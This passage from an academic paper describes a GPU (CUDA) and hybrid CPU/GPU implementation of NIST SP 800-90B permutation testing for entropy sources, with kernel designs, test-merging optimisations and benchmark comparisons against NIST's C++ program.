CPU/GPU workflow of GPU-based parallel implementation of permutation testing. (A) Code running on the host/CPU. (B) Code running on the device/GPU. Full-size DOI: 10.7717/peerjcs.404/fig-2 permutation testing, which processes N iterations in parallel on the GPU according to the user’s GPU specification and repeats this process R=d10,000/Ne times. Figure 2 presents the workflow of the CPU and GPU. The host refers to a general CPU that executes the program sequentially, whereas the device refers to a parallel processor such as a GPU. In steps 1 to 3 of Fig. 2, the host performs 18 statistical tests on one million bytes of the input data (without shuffling) and holds the results. In step 4, the host calls a function that allocates the device memory required to process N iterations in parallel on the device. The use and size of the variables are listed in Table 3. In step 5, the input data (No. 1 in Table 3), and the results of the statistical tests in steps 1 to 3 (No. 4 in Table 3) are copied from the host to the device. In step 6, the host launches a CUDA kernel CurandInit, which initializes the N seeds used in the curand() function. The curand() function that generates random numbers using seeds on the device is invoked by the CUDA kernel Shuffling. When the host receives the completion of the kernel CurandInit, the host proceeds to steps 7 to 13.10,000 iterations are divided into R rounds and each round processes N iterations in parallel on the device. To process N iterations, the host launches the CUDA kernel Shuffling (step 8) and then launches the CUDA kernel Statistical test (step 9) as soon as the host receives the completion of the kernel Shuffling. When the host receives the completion of the kernel Statistical test, in step 10, the counters Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 11/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-2 http://dx.doi.org/10.7717/peerj-cs.404 Table 3 Use and size of variables allocated to GPU. No. Use of variable Size of variable (bytes) 1 Original data (input) 1,000,000 2 N shuffled data N ×1,000,000 3 N seeds used by curand() function N× sizeof(curandState)=N ×48 4 18 Original test statistics 18 × sizeof(double)=144 5 Counter Ci,0,Ci,1,Ci,2 for 1≤ i≤18 18× sizeof(int)×3=216 6 N shuffled data after Conversion II (Only used if the input is binary) N ×125,000 Ci,0, Ci,1, and Ci,2 for i∈{1,2,...,18}, which indicate the indices of the statistical tests, are copied from the device to the host. Following the operations in steps 17 to 19 of Algorithm 2, which correspond to those in steps 12 and 13 of Fig. 2, the host moves on to step 14 if Eq. (2) is satisfied for all i. Finally, in step 14, the host determines whether or not the input data are IID. When the input data are binary, two conversions should be considered when designing the CUDA kernels. Therefore, we describe the CUDA kernels designed to process N iterations in parallel on the GPU depending on whether the input data are binary. The descriptions of the CUDA kernels Shuffling and Statistical test for non-binary noise sample are as follows: CUDA kernel Shuffling The kernel Shuffling generates N shuffled data by permuting one million bytes of the original data N times in parallel. Thus, each of N CUDA threads permutes the original data using the Fisher–Yates shuffle algorithm and then stores the shuffled data in the global memory of the device. As the shuffle algorithm uses the curand() function, each thread uses its unique seed that is initialized by the kernel CurandInit with its index, respectively. CUDA kernel Statistical test The kernel Statistical test performs 18 statistical tests on each of N shuffled data, and compares the shuffled and original test statistics. The size of each shuffled data is one million bytes and N shuffled data are stored in the global memory of the device. In this section, we present two methods that can easily be designed to handle this process in parallel on the GPU and propose an optimized method. Parallelization method 1 One CUDA thread performs 18 statistical tests sequentially on one shuffled dataset. This method is illustrated in Fig. 3. If this method is applied to the kernel Statistical test, B′=(N /T) CUDA blocks are used when the number of CUDA threads is T . However, because each thread runs 18 tests in sequence, room for improvement is apparent in this method. Parallelization method 2 In this method, each block performs its designated statistical test out of 18 tests on one shuffled dataset shared by 18 blocks. Thus, for one shuffled set, 18 statistical tests are run in parallel, and this Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 12/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 method is a parallelization of the serial part in method 1 above. This method is illustrated in Fig. 4, which indicates the kernel Statistical test with B′=((N /T)×18) CUDA blocks and T threads in a block. Proposed optimiza- tion This method optimizes parallelization method 2 through two steps. (Step 1) To hide the latency in accessing the slow global memory of the GPU, we analyzed the runtime of 18 statistical tests from an algorithmic perspective. We merged several statistical tests with similar access patterns to the global memory into a single test. Therefore, 9 merged statistical tests replace 18 statistical tests. (Step 2) When analyzed the execution time of nine merged tests, the execution time of one longest test was similar to the sum of the execution times of the remaining eight tests. We configured each thread of a block to runs the longest test and each thread of the other block to run eight merged tests so that the workload between SMs is balanced. This method is depicted in Fig. 5, where the kernel Statistical test uses B′=((N /T)×2) CUDA blocks, with T threads in each block. With slight modifications to the kernels Shuffling and Statistical test, which are designed for non-binary samples, as described above, we can parallelize the permutation testing when the input data are binary. If the noise sample size is 1 bit, one of two conversions is applied to certain statistical tests. The data after Conversion I and data after Conversion II can be stored separately in the global memory. Since the data after Conversion I are the result of calculating the Hamming weight of the data following Conversion II, we designed to minimize the use of global memory as follows: In the kernel Shuffling, N CUDA threads first generate N shuffled data in parallel. Thereafter, each thread proceeds to Conversion II for its own shuffled data and stores the results (No. 6 in Table 3) in the global memory of the GPU. The kernel Statistical test runs nine merged tests. The merged tests that required Conversion I calculate the Hamming weight of the data after Conversion II. As in the optimized method for non-binary data, the thread in the block executes at least one test so that the execution time of each block is similar. Therefore, B′=(N /T)× 4 CUDA blocks are used when the number of CUDA threads is T . Overview of hybrid CPU/GPU implementation of permutation testing We implemented the GPU-based permutation testing, which comprised 18 statistical tests without the compression algorithm and is parallel on the GPU. This section presents a hybrid CPU/GPU implementation of permutation testing that includes the compression algorithm. As shown in Fig. 6, we designed the hybrid implementation to perform 10,000 shuffling and compression tests using OpenMP according to the result of our GPU- based permutation testing. The noise source is determined as the non-IID if at least one test does not satisfy Eq. (2), as shown in Algorithm 2. Therefore, if our GPU-based Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 13/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Figure 3 General parallel method 1 of kernel Statistical test. Full-size DOI: 10.7717/peerjcs.404/fig-3 Figure 4 General parallel method 2 of kernel Statistical test. Full-size DOI: 10.7717/peerjcs.404/fig-4 Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 14/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-3 https://doi.org/10.7717/peerjcs.404/fig-4 http://dx.doi.org/10.7717/peerj-cs.404 Figure 5 Proposed optimization method of kernel Statistical test. Full-size DOI: 10.7717/peerjcs.404/fig-5 program determined that the input noise source is non-IID, our hybrid program finally determines that the input is non-IID, without compression tests. If our GPU-based program determined that the input is IID, the noise source might be determined to be IID or be determined to be non-IID only by the result of the compression test. Therefore, our hybrid program performs at most 10,000 shuffling and compression tests in parallel using OpenMP. If the results of the compression tests satisfy Eq. (2), the noise source is finally determined as the IID; otherwise, it is determined as the non-IID. EXPERIMENTS AND PERFORMANCE EVALUATION In this section, we analyze the performance of the proposed methods and compare its performance with the NIST program written in C++. The performance was evaluated using two hardware configurations (Table 4). There are two noise sources used in experiments. The first noise source is truerand provided by the NIST. The second noise source, GetTickCount, could be collected through the GetTickCount() function in the Windows environment. The sample size of each noise source is 1, 4, or 8 bits. As a result of confirming whether the input data are IID by the IID test, truerand was determined as the IID noise source; however, GetTickCount was determined as the non-IID noise source. Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 15/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-5 http://dx.doi.org/10.7717/peerj-cs.404 Figure 6 Proposed hybrid CPU/GPU program of permutation testing. (A) Process on the host/CPU. (B) Process on the device/GPU. Full-size DOI: 10.7717/peerjcs.404/fig-6 The experimental result is the average of the results repeated 20 times. The difference between the results of the experiments repeated 20 times was within 5%. Since the GPU Boost technology, which controls the clock speed according to extra power availability, is used in NIVIDA GPU, the results are with the GPU Boost applied, unless otherwise noted. GPU optimization concepts We conducted experiments on the optimization concepts considered while GPU-based parallelizing the permutation testing. The experimental data used in this section consisted of one million samples collected from the noise source GetTickCount, where the sample size was 8 bits. In the experiments, we set T , the number of threads per block used in the CUDA kernel, to 256, a multiple of the warp size (=32). Since T is set to 256, we set N to 2,048, which is the multiple T , and used about 2 GB (= N×1,000,000 bytes) of the global memory of the GPU. Coalesced memory access We used the memory coalescing technique (Fig. 7) to transfer data from slow global memory to the registers efficiently. Table 5 displays the performance of our parallel implementation of the permutation testing before and after using this technique. Permutation testing used Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 16/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-6 http://dx.doi.org/10.7717/peerj-cs.404 Table 4 Configurations of experimental platforms. Name Device A Device B CPU model Intel(R) Core (TM) i7-8086K Intel(R) Core (TM) i7-7700 CPU frequency 4.00 GHz 3.60 GHz CPU cores 6 4 CPU threads 12 8 Accelerator type NVIDIA GPU NVIDIA GPU Models TITAN Xp GeForce GTX 1060 Multiprocessors (SMs) 30 10 CUDA cores/SM 128 128 CUDA capability major 6.1 6.1 Global memory 12,288 MB 6,144 MB GPU Max clock rate 1,582 MHz 1,709 MHz Memory clock rate 5,750 MHz 4,004 MHz Registers/block 65,536 65,536 Threads/SM 2,048 2,048 Threads/block 1,024 1,024 Warp size 32 32 CUDA driver version 10.1 10.1 Figure 7 Memory coalescing technique. Full-size DOI: 10.7717/peerjcs.404/fig-7 Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 17/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-7 http://dx.doi.org/10.7717/peerj-cs.404 Table 5 Performance of proposed GPU-based parallel implementation of permutation testing de- pending on whether memory coalescing technique was used (the number of CUDA blocks = 16, the number of threads per block = 256). Before using memory coalescing technique (s) After using memory coalescing technique (s) Device A 27.2 19.0 Device B 54.1 33.9 the kernel Statistical test with our optimization method. As a result, we improved performance by 1.5 times. All experiments after this section use the memory coalescing technology. Merging statistical tests Our optimization method consists of a step in which tests are merged (Step 1) and a step in which at least one test is allocated in the CUDA block so that the working time of each thread is similar (Step 2). Therefore, we confirmed the validity of our merged tests. We first designed new CUDA kernels for experimentation, where each of the N threads performed one statistical test on one shuffled data. We measured the execution time of each test kernel. Each test kernel used eight CUDA blocks since we set the number of threads per block T to 256. The experimental results showing the execution time of each statistical test on the GPU are shown in Table 5. From Table 6, it takes approximately four seconds if one thread sequentially performs 18 statistical tests. However, if one thread performs nine merged tests, it can be expected that it will take about 2.3 seconds. We improved the performance for all 18 statistical tests by about 1.7 times by combining the tests. We measured the execution time of the parallelization method 2 applied Step 2, and our method. Referring to the results of Table 6, we designed each CUDA block of method 2 which Step 2 was applied to proceed with each of tests 1∼6, test 7, test 8, and tests 9∼18; each block can complete its work in a similar time. The kernel Statistical test applying this method uses 32 (=(N /T)×4) blocks; however, applying our proposed method uses 16 (= (N /T)×2) blocks. Table 7 presents the execution time of a kernel Statistical test with each method applied. As a result, our method is about 1.5 times faster than the parallelization method 2 applied Step 2. Parallelism methods We experimentally verified whether the proposed optimization method is better than other methods. We first confirmed the difference in the operation time of each CUDA thread in the kernel Statistical test, where each parallelization method is applied by drawing a figure. Figure 8 displays the operation times of the CUDA threads, assuming that the GPU had three SMs and considering the results of Table 6. It is the task of the GPU scheduler to allocate the CUDA blocks to the SMs; however, these were assigned arbitrarily for visualization in Fig. 8. As indicated in Table 6, the statistical tests had different execution times. Therefore, we expressed the different lengths of the threads in Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 18/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Table 6 Left: execution time of each statistical test on GPU; right: execution time of each merged statistical test on GPU (Device A, number of CUDA blocks = 8, number of threads per block = 256). No. Name of statistical test Execution time (ms) No. Name of merged statistical test Execution time (ms) 1 Excursion test 214 1′ Excursion test 214 2 Number of directional runs 75 2′ Directional runs and number of inc/dec 90 3 Length of directional runs 81 4 Numbers of increases and decreases 38 5 Number of runs based on median 103 3′ Runs based on median 143 6 Length of runs based on median 128 7 Average collision test statistic 1,257 4′ Collision test statistic 1,258 8 Maximum collision test statistic 1,238 9 Periodicity test (lag=1) 50 5′ Per/Cov test (lag=1) 129 10 Covariance test (lag=1) 71 11 Periodicity test (lag=2) 94 6′ Per/Cov test (lag=2) 137 12 Covariance test (lag=2) 113 13 Periodicity test (lag=8) 93 7′ Per/Cov test (lag=8) 134 14 Covariance test (lag=8) 111 15 Periodicity test (lag=16) 93 8′ Per/Cov test (lag=16) 134 16 Covariance test (lag=16) 111 17 Periodicity test (lag=32) 93 9′ Per/Cov test (lag=32) 134 18 Covariance test (lag=32) 111 Table 7 Performance of parallelization method 2 applied Step 2 and our method (Device A, the num- ber of threads per block = 256). Number of CUDA blocks Execution time (s) Parallelization method 2 (18 tests) +Step 2 32 2.24 Our method (9 merged tests +Step 2) 16 1.51 the CUDA blocks running each statistical test, as illustrated in Fig. 8. In the proposed method, several statistical tests were merged for optimization. The execution time of the merged statistical test (Table 6) was equal to or slightly longer than each execution time of the original statistical tests prior to merging (Table 6). Suppose that Test 1&2 is a merged function of Test 1 and Test 2. The lengths of the threads in the block running Test 1&2 were slightly longer than those of the threads in the block running Test 1 or Test 2, as indicated in Fig. 8. As illustrated in Fig. 8, we expected that our optimization outperformed parallelization methods 1 and 2. We measured the execution time of a kernel Statistical test according to the parallel method. Table 8 shows the execution times of each kernel measured on both devices. If the occupancy of the kernel in our parallelization method is calculated, it reaches 100%. It is the occupancy per SM. Since our method uses a small number of blocks, there may be idle SMs on a high-performance GPU with many SMs. However, if the host calls the test kernel Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 19/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Figure 8 Operation times of CUDA threads in kernel Statistical test when applying each method on device. Full-size DOI: 10.7717/peerjcs.404/fig-8 Table 8 Execution time of kernel Statistical test according to parallel method (number of threads per block = 256). Execution time (s) Method Number of CUDA blocks Device A Device B Parallelization method 1 8 4.53 6.39 Parallelization method 2 144 2.77 6.33 Our optimization (Step 1) 72 1.62 2.94 Our optimization (Step 1&2) 16 1.51 2.76 for each noise source simultaneously using a multi-stream technique, we can use almost full GPU capability. Since 18 statistical tests were running in parallel, the parallelization method 2 was improved by 1.6 times over method 1 in Device A; however, there was no improvement in the performance in Device B. In Device B, the number of SMs was 10, and the number of active blocks was calculated by eight. Thus, it is analyzed as the result derived since the number of blocks generated by the kernel (=144) is more than the number of blocks active in the device simultaneously (=80). Our method (Step 1) is about 1.7 and 2.1 times, respectively, faster than the parallelization method 2 in Device A and Device B. It is analyzed as the results due to the merged statistical tests that improved the performance, Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 20/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-8 http://dx.doi.org/10.7717/peerj-cs.404 Figure 9 Execution time of the GPU-based parallel implementation of permutation testing according to parallel method (number of threads per block = 256). Full-size DOI: 10.7717/peerjcs.404/fig-9 as confirmed in the previous section. Since the work of each CUDA block was adequately balanced, it is analyzed that our method (Step 1&2) was slightly improved over our method (Step 1). Furthermore, our method is 3 times and about 2.3 times, respectively, faster than the parallelization method 1 in Device A and Device B. Next, we analyzed how each method affected the performance of GPU-based implementation of permutation testing. As shown in Algorithm 2, the permutation testing has 10,000 iterations. Since implemented N iterations in parallel, the kernel CurandInit is called once, and the kernel Shuffling and Statistical test are called d10,000/Ne times. Since we set N to 2,048 and did not use Eq. (2) in this experiment, the permutation testing consists of one CurandInit, five Shuffling and five Statistical test. Figure 9 shows the execution time of this permutation testing according to the parallelization method. The permutation testing applied our method shows an improvement of about 1.8 times over the permutation testing applied method 1. Thus, our optimization method outperformed parallelization methods 1 and 2. Performance evaluation of GPU-based permutation testing according to the parameter Parameter N is the number of iterations of the permutation testing to be processed in parallel. We measured the performance of the GPU-based parallel implementation of the permutation testing according to the value of the parameter N . As shown in Fig. 2, the kernel CurandInit is called once. The kernel Shuffling and Statistical test are called at most d10,000/Ne times. The calling process repeated is as follows: After the kernel Shuffling and the kernel Statistical test are sequentially run once, if the results do not satisfy Eq. (2), each kernel is called again. If each kernel Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 21/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-9 http://dx.doi.org/10.7717/peerj-cs.404 Table 9 Execution time of the GPU-based parallel permutation testing according to the value of the parameter N . Parameter N 1,000 2,000 2,500 5,000 10,000 Global memory (GB) 0.93 1.86 2.33 4.66 9.31 Execution time (s) truerand 2.69 3.78 4.53 9.20 19.76 Device A GetTickCount 26.92 18.81 18.19 18.43 19.83 truerand 3.59 6.80 8.58 − − Device B GetTickCount 35.75 33.97 34.49 − − has been called d10,000/Ne times or the results satisfy Eq. (2), the call to each kernel is aborted. If the noise source is IID, there is little evidence against the null hypothesis that the noise source is IID in the permutation testing. The probability of satisfying Eq. (2) increases, and the number of the calls of the kernel decreases. On the other hand, if the noise source is Non-IID, the probability of satisfying Eq. (2) decreases, and the number of the calls increases, contrary to the IID noise source case. Therefore, we used truerand and GetTickCount, which were determined as the IID and the non-IID, respectively, by permutation testing. The sample size of each noise source is 8 bits. Permutation testing performs 10,000 iterations, so we set N to be a factor of 10,000 and T to 250. Since the size of the global memory in Device A is 12 GB, we set N to 1,000, 2,000, 2,500, 5,000, and 10,000. In Device B, the size of the global memory is 6 GB, and so we set N to 1,000, 2,000, and 2,500. Table 9 presents the execution time of the GPU-based parallel implementation of the permutation testing and the usage of global memory (calculated by referring to Table 3), according to the value N . When truerand was used as input data, each of the kernel Shuffling and Statistical test was called once, and then the noise source was determined as the IID through the test results. Therefore, in an environment (e.g., Hardware RNG) where the noise sources are likely to be IID, it is analyzed that it is appropriate even if the user sets N to 1,000. In GetTickCount, each kernel was called d10,000/Ne times and then was determined as the non-IID. The execution time multiplied by d10,000/Ne, when truerand was the input, gives a similar result to the execution time when GetTickCount was the input. As shown in Table 9, in the case of GetTickCount, as N increases, the execution time decreases and then increases again. Each thread used the global memory of 1 million bytes. Therefore, we analyzed it as a result of the latency derived by increasing access to global memory as the number of switching by the warp unit increases. It is appropriate to select N by considering all of the global memory usages, execution time determined as an IID noise source, and execution time determined as a non-IID noise source in a general environment. As a result of the experiment, it is appropriate to set N to 2,500 when using Device A and to select N to 2,000 when using Device B. Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 22/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Table 10 Performances of our GPU-based program and NIST program written in C++ according to noise source (without the compression test). Execution time (s) Name of noise source truerand GetTickCount Sample size (bit) 1 4 8 1 4 8 NIST program (CPU single-thread) 43.42 77.52 24.94 434.42 485.58 638.89 Device A NIST program (CPU multi-thread) 37.53 54.91 23.66 331.76 339.79 347.68 Proposed program (GPU) 3.17 4.39 4.53 12.72 17.63 18.19 NIST program (CPU multi-thread) 41.35 50.15 23.18 361.23 347.15 353.52 Device B Proposed program (GPU) 4.60 5.91 6.80 23.01 29.58 33.97 Performance evaluation of GPU-based permutation testing with NIST program according to noise source For each noise source, we measured the performances of our GPU-based program and the NIST program. Two noise sources, truerand and GetTickCount, were used in the experiment and the sample size of each noise source is one of 1, 4, and 8 bits. We set N to 2,500 and 2,000, respectively, when using Device A and Device B, reflecting the result of the previous experiment. We set T to 250. The NIST program, written in C++, is compatible with OpenMP and can make 10,000 iterations work in a multi-threaded environment. In this experiment, the NIST program running on the CPU used 12 CPU threads in Device A and eight CPU threads in Device B (Table 4). Thus, we compared our performance with permutation testing in the single-threaded and multi-threaded NIST programs. Since our GPU-based parallel implementation of the permutation testing was designed without the compression algorithm, we measured the performance of the NIST program without the compression test. Table 10 presents the execution times of the NIST program on the CPU and the proposed program on the GPUs, measured for each noise source. For truerand, the performance of the proposed program was approximately 17.6 times better than that of the single-threaded NIST program. It was about 12.5 times better than the performance of the multi-threaded NIST program. In the case of GetTickCount, the performance of our program was improved by approximately 35.1 times and about 26.1 times over the single-threaded and the multi-threaded NIST programs. In Table 10, the minimum performance improvement of the proposed program for truerand was not higher than that of the program for GetTickCount. As shown in Algorithm 2, the number of iterations (up to 10,000) in permutation testing varies depending on whether Eq. (2) is satisfied. The NIST program on the CPU was executed as one statistical test unit. If the accumulated results of the statistical test satisfied Eq. (2), that test was no longer performed in the iterations. On the other hand, our program on the GPU was executed as an N unit of 18 statistical tests, and if the results of all tests satisfied Eq. (2), it was not repeated. Namely, the kernel Shuffling and Statistical test were not called again. If the noise source was likely to be determined as the IID from the permutation testing, there is a high probability that all of the statistical tests satisfy Eq. (2). The NIST Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 23/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Table 11 Execution time of the GPU-based parallel implementation of permutation testing with/with- out GPU Boost (Device A). Execution time (s) Name of noise source With GPU Boost Without GPU Boost truerand-1bit 3.17 3.21 truerand-4bit 4.39 4.57 truerand-8bit 4.53 4.66 GetTickCount-1bit 12.72 12.87 GetTickCount-4bit 17.63 18.28 program operating as one test unit repeatedly performed each test less than N times and then determined truerand as the IID; however, in the case of GetTickCount, both the NIST program and our program performed 10,000 iterations and determined GetTickCount as the non-IID. Therefore, it is analyzed that the difference in performance improvement of our program by noise source is reasonable. NVIDIA GPU Boost technology boosts the CUDA core frequency from 1,582 to 1,873 MHz in Device A. The execution time of our GPU-based program without GPU Boost is presented in Table 11. Without GPU Boost, the performance decreased by up to 0.96 times compared to the case with GPU Boost. It is analyzed that the difference in performance with or without GPU Boost is not significant. The performance of our GPU-based program without GPU Boost is approximately 5 to 34 times better than the single-threaded NIST program and about 5 to 25 times better than the multi-threaded NIST program. Performance evaluation of our hybrid CPU/GPU program We measured the performance of the proposed hybrid CPU/GPU program and the NIST program using truerand and GetTickCount, whose sample size is 8 bits. Both programs included the compression test. Figure 10 presents the performance of each program. A base-10 logarithmic scale is used for the Y -axis. Since the NIST program performs the compression tests, it takes longer than the runtime of the NIST program without the compression test written in Table 10. In particular, when determining GetTickCount to be non-IID, the compression test runs almost 10,000 times, and so the NIST program, in this case, takes much longer than the runtime written in Table 10. Our hybrid CPU/GPU program performs the compression tests using OpenMP only when our GPU-based program determined the noise source (e.g., truerand) as the IID. As shown in Fig. 10, it is reasonable that the execution time of our hybrid program for truerand is longer than that of our GPU-based program presented in Table 10. Since GetTickCount was determined as the non-IID by our GPU-based program, the compression test does not run in our hybrid program. Therefore, our hybrid program has the same execution time as our GPU-based program in Table 10. Compared to the single-threaded NIST program, the proposed hybrid CPU/GPU program had an improved performance of approximately 4.9 to 192.9 times. Compared Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 24/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 Figure 10 Execution time of our hybrid program and NIST program. Full-size DOI: 10.7717/peerjcs.404/fig-10 with the multi-threaded NIST program, the performance improved about 3.8 to 29.7 times. The NIST program always performed up to 10,000 compression tests using OpenMP; however, our hybrid program performed the compression tests using OpenMP only if the noise source was determined as the IID by all 18 statistical tests in our GPU-based program. Therefore, our hybrid program is efficient when determining the noise source as the non-IID than when determining the noise source as the IID. When the NIST program applies our implementation method, it first performs the shuffling and 18 statistical tests (at most 10,000 times). If it determined that the noise source was non-IID by these results, it does not run the shuffling and the compression tests. When the input is non-IID, the NIST program (with the compression test) had the same runtime presented in Table 10. Otherwise, the NIST program has the same runtime as the original program. Therefore, our hybrid CPU/GPU program sped the process about 3 times over the multi-threaded NIST program applied our method for IID noise sources (8-bit sample size). Our program had an improved performance of approximately 25 for the non-IID input. CONCLUSIONS The security of modern cryptography is heavily reliant on sensitive security parameters such as encryption keys. RNGs should provide cryptosystems with ideal random bits, which are independent, unbiased, and, most importantly, unpredictable. To use a secure RNG, it is necessary to estimate its input entropy as precisely as possible. The NIST offers Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 25/29 https://peerj.com https://doi.org/10.7717/peerjcs.404/fig-10 http://dx.doi.org/10.7717/peerj-cs.404 two programs for entropy estimations, as outlined in SP 800-90B. However, much time is required to manipulate several noise sources for an RNG. We proposed GPU-based parallel implementation of the permutation testing, which required the longest execution time in the IID test of SP 800-90B. Our GPU-based implementation excluded the compression test that is unsuitable for CUDA version implementation. Our GPU-based method was designed to use massive parallelism of the GPU by balancing the execution time for statistical tests, as well as optimizing the use of the global memory for data shuffling. We experimentally compared our GPU optimization with the NIST program excluded the compression test. Our GPU-based program was approximately 3 to 34 times faster than the single-threaded NIST program. Moreover, our proposal improved the performance by about 3 to 25 times over the multi-threaded NIST program. We proposed the hybrid CPU/GPU implementation of the permutation testing. It consists of our GPU-based program and the compression tests that run using OpenMP. Experimental results show that the performance of our hybrid program is approximately 3 to 25 times better than that of the multi-threaded NIST program (with compression test). Most noise sources are non-IID, and our program has better performance when determining the noise source as the non-IID. It is expected that the time required for analyzing the RNG security will be significantly reduced for developers and evaluators by using the proposed approach, thereby improving the validation efficiency in the development of cryptographic modules. It is expected that our optimization techniques might be adapted to the problems of performing several tests or processes on thousands or more of data, each of which is large. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by an Institute for Information & Communications Technology Promotion (IITP) grant funded by the Korean Government (MSIT) (No. 2014-6-00908, Research on the Security of Random Number Generators and Embedded Devices). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Institute for Information & Communications Technology Promotion (IITP) grant: No. 2014-6-00908. Competing Interests The authors declare there are no competing interests. Author Contributions • Yewon Kim conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 26/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.404 • Yongjin Yeom conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Data and source code are available at GitHub: https://github.com/yeah1kim/yeah_ GPU_SP800_90B_IID. REFERENCES Barker E, Kelsey J. 2012. Recommendation for the entropy sources used for random bit gen- eration. National Institute of Standards and Technology NIST Special Publication (SP) 800-90B (Draft). Bernstein DJ, Chang Y-A, Cheng C-M, Chou L-P, Heninger N, Lange T, Van Someren N. 2013. Factoring RSA keys from certified smart cards: Coppersmith in the wild. In: Sako K, Sarkar P, eds. Advances in Cryptology - ASIACRYPT 2013. ASIACRYPT 2013. Lecture notes in computer science, vol. 8270. Berlin, Heidelberg: Springer, 341–360 DOI 10.1007/978-3-642-42045-0_18. Ding Y, Peng Z, Zhou Y, Zhang C. 2014. Android low entropy demystified. In: 2014 IEEE international conference on communications (ICC). Piscataway: IEEE, 659–664. Heninger N, Durumeric Z, Wustrow E, Halderman JA. 2012. Mining your Ps and Qs: detection of widespread weak keys in network devices. In: Presented as part of the 21st USENIX security symposium (USENIX Security 12). 205–220. ISO/IEC-20543. 2019. Information technology —Security techniques —Test and analysis methods for random bit generators within ISO/IEC 19790 and ISO/IEC 15408. Kang J-S, Park H, Yeom Y. 2017. On the additional chi-square tests for the IID assump- tion of NIST SP 800-90B. In: 2017 15th annual conference on privacy, security and trust (PST). Piscataway: IEEE, 375–3757. Kaplan D, Kedmi S, Hay R, Dayan A. 2014. Attacking the Linux PRNG On Android: weaknesses in seeding of entropic pools and low boot-time entropy. In: 8th USENIX workshop on offensive technologies (WOOT 14). Kelsey J. 2012. Entropy sources and you: an overview of SP 800-90B. In: Random Bit Generation Workshop. Kim SH, Han D, Lee DH. 2013. Predictability of Android OpenSSL’s pseudo random number generator. In: Proceedings of the 2013 ACM SIGSAC conference on Computer & communications security. New York: ACM, 659–668. Li P, Zhou S, Ren B, Tang S, Li T, Xu C, Chen J. 2019. Efficient implementation of lightweight block ciphers on volta and pascal architecture. Journal of Information Security and Applications 47:235–245 DOI 10.1016/j.jisa.2019.04.006. Li Q, Zhong C, Zhao K, Mei X, Chu X. 2012. Implementation and analysis of AES encryption on GPU. In: 2012 IEEE 14th international conference on high performance computing and communication & 2012 IEEE 9th international conference on embedded software and systems. Piscataway: IEEE, 843–848. Kim and Yeom (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.404 27/29 https://peerj.com https://github.com/yeah1kim/yeah_GPU_SP800_90B_IID https://github.com/yeah1kim/yeah_GPU_SP800_90B_IID http://dx.doi.org/10.1007/978-3-642-42045-0_18 http://dx.doi.org/10.1016/j.jisa.2019.04.006 http://dx.doi.org/10.7717/peerj-cs.404 Ma J, Chen X, Xu R, Shi J. 2017. Implementation and evaluation of different parallel designs of AES using CUDA. In: 2012 IEEE 14th International Conference on High Performance Computing and Communication & 2012 IEEE 9th International Conference on Embedded Software and Systems. Piscataway: IEEE, 606–614. Michaelis K, Meyer C, Schwenk J. 2013. Randomly failed! The state of randomness in current Java implementations. In: Dawson E, ed. Topics in Cryptology – CT-RSA 2013. CT-RSA 2013. Lecture notes in computer science. vol. 7779. Berlin, Heidelberg: Springer, 129–144 DOI 10.1007/978-3-642-36095-4_9. Müller S. 2020. Linux random number generator - a new approach. Available at https: //chronox.de/lrng/doc/lrng.pdf (accessed on February 2020). Neves S, Araujo F. 2011. On the performance of GPU public-key cryptography. In: ASAP 2011-22nd IEEE international conference on application-specific systems, architectures and processors. Piscataway: IEEE, 133–140. NIST. 2015. EntropyAssessment. GitHub. Available at https://github.com/usnistgov/ SP800-90B_EntropyAssessment (accessed on February 2020). NIST, CSE. 2021. Implementation guidance for FIPS PUB 140-2 and the cryptographic module validation program. Available at http://csrc.nist.gov/groups/STM/cmvp/ documents/fips140-2/FIPS1402IG.pdf (accessed on February 2020). NVIDIA. 2020a. CUDA C++ BEST Practices guide. In: NVIDIA, Aug. Available at https://docs.nvidia.com/cuda/cuda-c-best-practices-guide/index.html (accessed on February 2020). NVIDIA. 2020b. CUDA C++ Programming guide. NVIDIA, Aug. Available at https:// docs.nvidia.com/cuda/cuda-c-programming-guide/index.html (accessed on February 2020). OpenMP. 2018. OpenMP application programming interface. Available at https://www. 